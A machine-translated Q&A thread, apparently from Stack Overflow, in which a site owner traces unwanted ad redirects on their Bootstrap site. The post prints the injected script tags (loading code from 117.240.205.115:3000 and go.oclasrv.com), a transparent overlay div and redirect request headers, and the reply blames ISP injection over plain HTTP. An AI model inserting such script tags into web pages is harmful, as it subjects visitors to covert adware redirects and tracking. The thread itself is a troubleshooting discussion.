未知脚本正在运行,并在点击未知websties时重定向

Question

问题: -有时,点击NAVBAR菜单或我的bootstrap网站上的任何div,它会重定向到新标签中的广告或未知链接.

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

从托管文件导入的链接: -

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

我在检查中得到了什么: -

当我点击菜单上没有重定向时,我多次检查了我的代码..我发现没有任何可疑......但是当我点击链接重定向链接时,我在浏览器中检查了我的代码,我可以清楚地看到几个脚本源添加到我的文件(只能在浏览器的检查模式下查看).它们不写入我的代码.我的代码的未知部分是..

1)HERE以下2个脚本正在替换head标记中的脚本js/jquery.min.js

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2)在导入google api后,这个正被添加到body标签中

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3)这个也是身体标签.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4)检查重定向链接.HEADERS信息: -

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

我尝试了什么: -

我的代码很干净,没有脚本将它重定向到某个地方.它可能是我的浏览器或Windows被攻陷.我检查了3个浏览器的网站EDGE,CHROME,FIREFOX ..同样的问题.然后我从Win7升级到Windows 10并进行全新安装.但什么都没发生.然后我想到要求Hostgator支持如果服务器被泄露他们从他们的结束回复它...我安装了malwarebytes和所有软件来解决它...但他们只是通知chrome/firefox/Edge重定向到一些出站ID域名大多是go.oclasrv.com而什么都不做.

**

任何解决方案???

**

更新: -

我在Hostgator支持反馈链接上获得了类似的重定向..

注意到,这里字符串中的域名被rateus.in替换.zoneID = 1492761与我打开的任何不安全链接相同.. cb = xxxxxxxxxxxx和tm = xxxxxxxxxxx也针对不同的链接而改变而指纹= c2VwLW5vLXJlZGlyZWN0对于所有链接都是相同的打开.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

我的操作系统完全升级到WIN10专业版,我只安装了Chrome而没有任何插件......

这个问题与浏览器无关,因为我在EDGE和Firefox上获得了相同的结果.

任何可以帮助我的JS专家

Answer 1

这似乎是ISP注入JavaScript文件的情况.您是否有机会使用BSNL宽带？最近几天,BSNL似乎在HTTP(非加密)网站上注入广告软件.

我知道的唯一解决方案是在https上托管您的网站或更改您的ISP.